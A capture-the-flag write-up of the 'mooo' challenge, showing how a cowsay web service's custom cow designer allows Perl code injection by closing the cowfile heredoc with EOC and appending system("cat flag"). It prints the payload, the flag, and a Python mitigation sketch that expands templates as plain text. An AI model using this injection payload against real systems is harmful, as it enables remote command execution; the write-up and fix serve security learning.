day 4 - mooo
'Moo may represent an idea, but only the cow knows.' - Mason Cooley
Recon
We are presented with a site that serves cow messages based on cowsay.
Either you type your message and select a cow from a dropdown, or you select the cow designer mode, where you can specify your own cow. cowsay doesn't allow specifying cows inline as a parameter, so we guess the custom cow is passed through the -f option for including a file.
custom cow designer
Observations:
@, {, }, [, $, and ] must be escaped with \.
%00 gives a failed message, the same as when you don't send a message, but this can be bypassed through URL encoding; entering hex values (\xab) also works.
cowsay
According to the cowsay source, you can open any file, like -f /etc/passwd. This works from the command line; if a file is not found, it prints the message "Could not find FILE cowfile!". However, the web page responds with "No such cow!". It seems the web application does a check before passing it to the command line.
From the source of cowsay:
    my $f = $opts{'f'};
    my $full = "";
    if ($opts{'f'} =~ m,/,) {
        $full = $opts{'f'};
    } else {
        for my $d (split(/:/, $cowpath)) {
            if (-f "$d/$f") {
                $full = "$d/$f";
                last;
            } elsif (-f "$d/$f.cow") {
                $full = "$d/$f.cow";
                last;
            }
        }
        if ($full eq "") {
            die "$progname: Could not find $f cowfile!\n";
        }
    }
    do $full;
Code injection
Custom cow:
$thoughts ^__^
$thoughts ($eyes)\\_______
(__)\\ )\\/\\
$tongue ||----w |
|| ||
EOC
my $tongue = 'lol';
And for the flag:
$thoughts ^__^
$thoughts ($eyes)\\_______
(__)\\ )\\/\\
$tongue ||----w |
|| ||
EOC
system("cat flag");
flag
AOTW{th3_p3rl_c0w_s4ys_M0oO0o0O} _______
< Mooo! >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
le ||----w |
|| ||
Flag
AOTW{th3_p3rl_c0w_s4ys_M0oO0o0O}
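
Mitigation sketch, added here as an example (not code from the challenge, the web application, or cowsay): because cowsay loads the cowfile with `do $full`, everything after the `EOC` line of a custom cow runs as Perl, so a designer mode is safer if it expands the template as plain text and never hands it to Perl. The names `expand`, `bubble` and `render` are hypothetical, and the sample input is the payload from this write-up.

```python
import re
import textwrap

# cowsay's default values for the three cowfile variables.
DEFAULTS = {"thoughts": "\\", "eyes": "oo", "tongue": "  "}
# Either a backslash escape (\X) or one of the three known placeholders.
TOKEN = re.compile(r"\\(.)|\$(thoughts|eyes|tongue)\b")

def expand(template, values=DEFAULTS):
    """Expand a designer template as plain text, never as Perl.

    A backslash escape yields the escaped character, the three known
    placeholders are substituted, and everything else (including an
    'EOC' line and whatever follows it) is copied literally.
    """
    def repl(m):
        return m.group(1) if m.group(1) is not None else values[m.group(2)]
    return TOKEN.sub(repl, template)

def bubble(message, width=40):
    """Draw a cowsay-style speech bubble around the message."""
    lines = textwrap.wrap(message, width) or [""]
    size = max(len(line) for line in lines)
    if len(lines) == 1:
        edges = [("<", ">")]
    else:
        edges = [("/", "\\")] + [("|", "|")] * (len(lines) - 2) + [("\\", "/")]
    body = [f"{l} {text.ljust(size)} {r}" for (l, r), text in zip(edges, lines)]
    return "\n".join([" " + "_" * (size + 2), *body, " " + "-" * (size + 2)])

def render(message, template):
    """Full picture: bubble on top, expanded cow underneath."""
    return bubble(message) + "\n" + expand(template)

# Constructed input: the designer payload shown in this write-up.
PAYLOAD = "\n".join([
    r"$thoughts ^__^",
    r"$thoughts ($eyes)\\_______",
    r"(__)\\ )\\/\\",
    r"$tongue ||----w |",
    r"|| ||",
    r"EOC",
    r'system("cat flag");',
])

if __name__ == "__main__":
    print(render("Mooo!", PAYLOAD))
```

With this approach the `EOC` line and the `system(...)` call are just two more lines of the drawing.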